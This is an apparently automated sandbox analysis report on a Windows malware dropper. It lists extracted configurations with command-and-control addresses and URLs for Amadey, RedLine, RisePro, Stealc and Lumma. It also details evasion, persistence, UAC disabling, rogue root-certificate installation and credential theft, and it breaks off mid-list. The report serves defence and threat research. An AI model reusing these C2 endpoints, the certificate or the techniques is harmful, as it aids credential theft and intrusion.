Analysis
-
max time kernel
41s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
18-04-2024 22:27
Static task
static1
Behavioral task
behavioral1
Sample
25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe
Resource
win10-20240404-en
General
-
Target
25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe
-
Size
2.8MB
-
MD5
8c51fab20bcd068ceee453c05b007538
-
SHA1
ab51d4035ba9685d9c13f295403c5456a7cedd27
-
SHA256
25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52
-
SHA512
9534527e8e2d31fbaee83756341792b77ae81f33ab448ead2eef7c1d341138bcb07fe00e3010f25801e21a84bad878e949e90ed63498ab14de7cf81fba76713b
-
SSDEEP
49152:T8Kw9EfTOhW1MLNVazcXj2FzNC8+CKR6sLZLGKA/HZLrfrwmq2B3tZ3n:wKw9qOhW16NVazQjofUE0ZLGKA/HZLrl
Malware Config
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
redline
@OLEH_PSP
185.172.128.33:8970
Extracted
redline
LiveTraffic
4.184.225.183:30592
Extracted
risepro
147.45.47.93:58709
Extracted
stealc
http://52.143.157.84
http://185.172.128.209
-
url_path
/c73eed764cc59dcb.php
Extracted
lumma
https://affordcharmcropwo.shop/api
https://cleartotalfisherwo.shop/api
https://worryfillvolcawoi.shop/api
https://enthusiasimtitleow.shop/api
https://dismissalcylinderhostw.shop/api
https://diskretainvigorousiw.shop/api
https://communicationgenerwo.shop/api
https://pillowbrocccolipe.shop/api
Signatures
-
Detect ZGRat V1 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe family_zgrat_v1 behavioral2/memory/7120-879-0x000001912E710000-0x000001912E9CB000-memory.dmp family_zgrat_v1 behavioral2/memory/7120-880-0x000001912E710000-0x000001912E9CB000-memory.dmp family_zgrat_v1 behavioral2/memory/7120-882-0x000001912E710000-0x000001912E9CB000-memory.dmp family_zgrat_v1 behavioral2/memory/7120-884-0x000001912E710000-0x000001912E9CB000-memory.dmp family_zgrat_v1 behavioral2/memory/7120-886-0x000001912E710000-0x000001912E9CB000-memory.dmp family_zgrat_v1 -
Glupteba payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/5608-826-0x0000000000400000-0x0000000003009000-memory.dmp family_glupteba behavioral2/memory/5620-842-0x0000000000400000-0x0000000003009000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
njkrTFrTho9m8pktYQyvD45u.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" njkrTFrTho9m8pktYQyvD45u.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe family_redline behavioral2/memory/5680-358-0x0000000000400000-0x0000000000452000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline -
Processes:
Uni400uni.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Uni400uni.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
Processes:
amert.exe58c9b1fd40.exeexplorha.exechrosha.exe25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exeexplorha.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 58c9b1fd40.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe -
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.exerundll32.exerundll32.exeflow pid process 51 4388 rundll32.exe 122 1628 rundll32.exe 139 5636 rundll32.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
58c9b1fd40.exeexplorha.exe25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exeexplorha.exeamert.exechrosha.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 58c9b1fd40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 58c9b1fd40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe -
Executes dropped EXE 31 IoCs
Processes:
explorha.exeamert.exe7285787827.exe58c9b1fd40.exeexplorha.exechrosha.exeswiiiii.exealexxxxxxxx.exeTraffic.exepropro.exegold.exeNewB.exejok.exeUni400uni.exeswiiii.exeDnj9wCSMo3RlVWDcjVwth586.exef6HIBpWZz6vXG4h2PgTe8JUo.exeSGn6P5CIYGdBbfvmRkm57P7D.exe070.exeis-EAKIF.tmpbuild_1GyXIDXRUC.exeu4oo.0.exee7eypyspmqtJqAFHcA4bI3CL.execddvdrunner2333.exee7eypyspmqtJqAFHcA4bI3CL.execddvdrunner2333.exee7eypyspmqtJqAFHcA4bI3CL.exee7eypyspmqtJqAFHcA4bI3CL.exee7eypyspmqtJqAFHcA4bI3CL.exenjkrTFrTho9m8pktYQyvD45u.exeStartup.exepid process 2340 explorha.exe 68 amert.exe 592 7285787827.exe 2532 58c9b1fd40.exe 3064 explorha.exe 3620 chrosha.exe 2572 swiiiii.exe 3160 alexxxxxxxx.exe 5312 Traffic.exe 5328 propro.exe 5356 gold.exe 5872 NewB.exe 1584 jok.exe 5376 Uni400uni.exe 5664 swiiii.exe 6072 Dnj9wCSMo3RlVWDcjVwth586.exe 5608 f6HIBpWZz6vXG4h2PgTe8JUo.exe 5620 SGn6P5CIYGdBbfvmRkm57P7D.exe 5504 070.exe 2256 is-EAKIF.tmp 5892 build_1GyXIDXRUC.exe 4668 u4oo.0.exe 6068 e7eypyspmqtJqAFHcA4bI3CL.exe 6112 cddvdrunner2333.exe 4348 e7eypyspmqtJqAFHcA4bI3CL.exe 5180 cddvdrunner2333.exe 6120 e7eypyspmqtJqAFHcA4bI3CL.exe 5968 e7eypyspmqtJqAFHcA4bI3CL.exe 592 e7eypyspmqtJqAFHcA4bI3CL.exe 6216 njkrTFrTho9m8pktYQyvD45u.exe 7120 Startup.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
chrosha.exe25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exeexplorha.exeamert.exe58c9b1fd40.exeexplorha.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine chrosha.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine 58c9b1fd40.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine explorha.exe -
Loads dropped DLL 14 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exeis-EAKIF.tmpe7eypyspmqtJqAFHcA4bI3CL.exee7eypyspmqtJqAFHcA4bI3CL.exee7eypyspmqtJqAFHcA4bI3CL.exee7eypyspmqtJqAFHcA4bI3CL.exee7eypyspmqtJqAFHcA4bI3CL.exeRegAsm.exerundll32.exepid process 3080 rundll32.exe 4388 rundll32.exe 1628 rundll32.exe 5760 rundll32.exe 5636 rundll32.exe 2256 is-EAKIF.tmp 6068 e7eypyspmqtJqAFHcA4bI3CL.exe 4348 e7eypyspmqtJqAFHcA4bI3CL.exe 6120 e7eypyspmqtJqAFHcA4bI3CL.exe 5968 e7eypyspmqtJqAFHcA4bI3CL.exe 592 e7eypyspmqtJqAFHcA4bI3CL.exe 5844 RegAsm.exe 5844 RegAsm.exe 7092 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 45.155.250.90 -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
explorha.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\7285787827.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000055001\\7285787827.exe" explorha.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\58c9b1fd40.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000056001\\58c9b1fd40.exe" explorha.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Uni400uni.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Uni400uni.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Uni400uni.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
e7eypyspmqtJqAFHcA4bI3CL.exee7eypyspmqtJqAFHcA4bI3CL.exedescription ioc process File opened (read-only) \??\D: e7eypyspmqtJqAFHcA4bI3CL.exe File opened (read-only) \??\F: e7eypyspmqtJqAFHcA4bI3CL.exe File opened (read-only) \??\D: e7eypyspmqtJqAFHcA4bI3CL.exe File opened (read-only) \??\F: e7eypyspmqtJqAFHcA4bI3CL.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 202 api.myip.com 204 ipinfo.io 144 ip-api.com 155 api.myip.com 160 ipinfo.io 200 api.myip.com 154 api.myip.com 161 ipinfo.io 203 ipinfo.io -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000055001\7285787827.exe autoit_exe -
Drops file in System32 directory 4 IoCs
Processes:
njkrTFrTho9m8pktYQyvD45u.exedescription ioc process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol njkrTFrTho9m8pktYQyvD45u.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI njkrTFrTho9m8pktYQyvD45u.exe File opened for modification C:\Windows\System32\GroupPolicy njkrTFrTho9m8pktYQyvD45u.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini njkrTFrTho9m8pktYQyvD45u.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exeexplorha.exeamert.exe58c9b1fd40.exeexplorha.exechrosha.exepid process 4404 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe 2340 explorha.exe 68 amert.exe 2532 58c9b1fd40.exe 3064 explorha.exe 3620 chrosha.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
swiiiii.exealexxxxxxxx.exegold.exeUni400uni.exeswiiii.exebuild_1GyXIDXRUC.exedescription pid process target process PID 2572 set thread context of 1004 2572 swiiiii.exe RegAsm.exe PID 3160 set thread context of 1708 3160 alexxxxxxxx.exe RegAsm.exe PID 5356 set thread context of 5680 5356 gold.exe RegAsm.exe PID 5376 set thread context of 5660 5376 Uni400uni.exe regasm.exe PID 5664 set thread context of 5844 5664 swiiii.exe RegAsm.exe PID 5892 set thread context of 1076 5892 build_1GyXIDXRUC.exe RegAsm.exe -
Drops file in Windows directory 2 IoCs
Processes:
25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exeamert.exedescription ioc process File created C:\Windows\Tasks\explorha.job 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe File created C:\Windows\Tasks\chrosha.job amert.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1380 2572 WerFault.exe swiiiii.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6004 schtasks.exe 6976 schtasks.exe 4556 schtasks.exe 1924 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133579528783483175" chrome.exe -
Processes:
propro.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 propro.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 propro.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exeexplorha.exeamert.exechrome.exe58c9b1fd40.exeexplorha.exechrosha.exerundll32.exepowershell.exeUni400uni.exepowershell.exeRegAsm.exerundll32.exepropro.exeRegAsm.exepid process 4404 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe 4404 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe 2340 explorha.exe 2340 explorha.exe 68 amert.exe 68 amert.exe 3572 chrome.exe 3572 chrome.exe 2532 58c9b1fd40.exe 2532 58c9b1fd40.exe 3064 explorha.exe 3064 explorha.exe 3620 chrosha.exe 3620 chrosha.exe 4388 rundll32.exe 4388 rundll32.exe 4388 rundll32.exe 4388 rundll32.exe 4388 rundll32.exe 4388 rundll32.exe 4388 rundll32.exe 4388 rundll32.exe 4388 rundll32.exe 4388 rundll32.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 5376 Uni400uni.exe 5376 Uni400uni.exe 5616 powershell.exe 5616 powershell.exe 5616 powershell.exe 5616 powershell.exe 5844 RegAsm.exe 5844 RegAsm.exe 5636 rundll32.exe 5636 rundll32.exe 5636 rundll32.exe 5636 rundll32.exe 5636 rundll32.exe 5636 rundll32.exe 5328 propro.exe 5328 propro.exe 5636 rundll32.exe 5636 rundll32.exe 5636 rundll32.exe 5636 rundll32.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe 1076 RegAsm.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
chrome.exepid process 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exepowershell.exeTraffic.exeUni400uni.exeregasm.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeDebugPrivilege 5312 Traffic.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeDebugPrivilege 5376 Uni400uni.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeDebugPrivilege 5660 regasm.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeDebugPrivilege 5616 powershell.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeShutdownPrivilege 3572 chrome.exe Token: SeCreatePagefilePrivilege 3572 chrome.exe Token: SeBackupPrivilege 5312 Traffic.exe Token: SeSecurityPrivilege 5312 Traffic.exe Token: SeSecurityPrivilege 5312 Traffic.exe Token: SeSecurityPrivilege 5312 Traffic.exe Token: SeSecurityPrivilege 5312 Traffic.exe Token: SeIncreaseQuotaPrivilege 5616 powershell.exe Token: SeSecurityPrivilege 5616 powershell.exe Token: SeTakeOwnershipPrivilege 5616 powershell.exe Token: SeLoadDriverPrivilege 5616 powershell.exe Token: SeSystemProfilePrivilege 5616 powershell.exe Token: SeSystemtimePrivilege 5616 powershell.exe Token: SeProfSingleProcessPrivilege 5616 powershell.exe Token: SeIncBasePriorityPrivilege 5616 powershell.exe Token: SeCreatePagefilePrivilege 5616 powershell.exe Token: SeBackupPrivilege 5616 powershell.exe Token: SeRestorePrivilege 5616 powershell.exe Token: SeShutdownPrivilege 5616 powershell.exe -
Suspicious use of FindShellTrayWindow 63 IoCs
Processes:
7285787827.exechrome.exepid process 592 7285787827.exe 592 7285787827.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 592 7285787827.exe 592 7285787827.exe 3572 chrome.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe -
Suspicious use of SendNotifyMessage 60 IoCs
Processes:
7285787827.exechrome.exepid process 592 7285787827.exe 592 7285787827.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 3572 chrome.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe 592 7285787827.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exeexplorha.exe7285787827.exechrome.exedescription pid process target process PID 4404 wrote to memory of 2340 4404 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe explorha.exe PID 4404 wrote to memory of 2340 4404 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe explorha.exe PID 4404 wrote to memory of 2340 4404 25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe explorha.exe PID 2340 wrote to memory of 68 2340 explorha.exe amert.exe PID 2340 wrote to memory of 68 2340 explorha.exe amert.exe PID 2340 wrote to memory of 68 2340 explorha.exe amert.exe PID 2340 wrote to memory of 592 2340 explorha.exe 7285787827.exe PID 2340 wrote to memory of 592 2340 explorha.exe 7285787827.exe PID 2340 wrote to memory of 592 2340 explorha.exe 7285787827.exe PID 592 wrote to memory of 3572 592 7285787827.exe chrome.exe PID 592 wrote to memory of 3572 592 7285787827.exe chrome.exe PID 3572 wrote to memory of 4864 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 4864 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe 